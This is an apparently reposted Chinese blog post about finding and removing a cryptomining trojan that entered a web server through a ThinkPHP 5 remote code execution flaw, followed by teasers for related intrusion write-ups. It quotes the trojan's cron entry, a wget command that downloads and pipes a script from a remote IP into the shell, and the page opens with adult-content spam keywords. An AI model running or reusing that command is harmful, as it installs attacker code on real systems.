成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專(zhuān)欄INFORMATION COLUMN

記一次掛馬清除經(jīng)歷:處理一個(gè)利用thinkphp5遠(yuǎn)程代碼執(zhí)行漏洞挖礦的木馬

incredible / 3225人閱讀

摘要:再看下的的權(quán)限就是的查看下幾個(gè)站的日志發(fā)現(xiàn)是利用最近爆出的遠(yuǎn)程代碼執(zhí)行漏洞漏洞細(xì)節(jié)修復(fù)一下問(wèn)題解決但是這個(gè)站點(diǎn)是測(cè)試站點(diǎn)端口監(jiān)聽(tīng)的是,難道現(xiàn)在黑客能開(kāi)始嗅探非常規(guī)端口了來(lái)源

昨天發(fā)現(xiàn) 一臺(tái)服務(wù)器突然慢了 top 顯示 幾個(gè)進(jìn)程100%以上的cpu使用

執(zhí)行命令為 :

/tmp/php -s /tmp/p2.conf

基本可以確定是被掛馬了

下一步確定來(lái)源

last 沒(méi)有登陸記錄

先干掉這幾個(gè)進(jìn)程,但是幾分鐘之后又出現(xiàn)了

先看看這個(gè)木馬想干什么吧

netstat 看到 這個(gè)木馬開(kāi)啟了一個(gè)端口和國(guó)外的某個(gè)ip建立了連接

但是tcpdump了一小會(huì)兒 沒(méi)有發(fā)現(xiàn)任何數(shù)據(jù)傳遞

這他是想干啥?

繼續(xù)查看日志吧

在cron日志中發(fā)現(xiàn)了www用戶(hù) 有一個(gè)crontab定時(shí)操作 基本就是這個(gè)問(wèn)題了

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

順著下載了幾個(gè)問(wèn)題,看了看 應(yīng)該是個(gè)挖礦的木馬程序

服務(wù)器上的www用戶(hù) 是安裝 lnmp 創(chuàng)建的,看了來(lái)源很可能就是web漏洞了。

再看/tmp下的php的權(quán)限 就是www的

查看 lnmp下幾個(gè)站的日志 發(fā)現(xiàn)是利用 thinkphp 5最近爆出的遠(yuǎn)程代碼執(zhí)行漏洞

漏洞細(xì)節(jié):https://nosec.org/home/detail...

修復(fù)一下問(wèn)題解決

但是 這個(gè)站點(diǎn)是測(cè)試站點(diǎn) 端口監(jiān)聽(tīng)的是 8083 ,難道現(xiàn)在黑客能開(kāi)始嗅探非常規(guī)端口了?

來(lái)源:https://www.simapple.com/425....

文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/29821.html

相關(guān)文章

  • 阿里云服務(wù)器被挖礦怎么解決

    摘要:微軟雅黑宋體春節(jié)剛開(kāi)始,我們安全,發(fā)布了年服務(wù)器被挖礦的整體安全分析報(bào)告。我們調(diào)查分析發(fā)現(xiàn),從網(wǎng)站漏洞被爆出后到修復(fù)漏洞的時(shí)間約大,一些網(wǎng)站被攻擊的狀況就越嚴(yán)重,服務(wù)器被挖礦的事情就會(huì)發(fā)生,如果及時(shí)的修復(fù)漏洞,那么就可以避免被挖礦。春節(jié)剛開(kāi)始,我們SINE安全,發(fā)布了2018年服務(wù)器被挖礦的整體安全分析報(bào)告。該安全報(bào)告主要是以我們?nèi)ツ甑恼荒甑陌踩珨?shù)據(jù)為基礎(chǔ),對(duì)這些服務(wù)器的被挖礦的整體情況進(jìn)...

    jas0n 評(píng)論0 收藏0
  • 道路千萬(wàn)條,安全第一條——一次服務(wù)器被入侵的處理經(jīng)過(guò)

    摘要:為了進(jìn)一步確認(rèn),再次到威脅情報(bào)平臺(tái)進(jìn)行查詢(xún)。再結(jié)合我部署的容器停止時(shí)間進(jìn)行分析,應(yīng)該是在我部署完成后幾小時(shí)內(nèi)服務(wù)器被入侵的。要從根本上解決問(wèn)題需要進(jìn)行溯源分析,避免服務(wù)器再次被入侵。結(jié)合以上線索以及個(gè)人經(jīng)驗(yàn)分析,很可能利用的漏洞進(jìn)行入侵的。 容器為何自動(dòng)停止? 服務(wù)器為何操作卡頓? 進(jìn)程的神秘連接到底指向何處? 發(fā)現(xiàn)——自動(dòng)停止的容器 某日發(fā)現(xiàn)部署在服務(wù)器上的一個(gè)容器被停掉了,開(kāi)始以為...

    aaron 評(píng)論0 收藏0

發(fā)表評(píng)論

0條評(píng)論

最新活動(dòng)
閱讀需要支付1元查看
<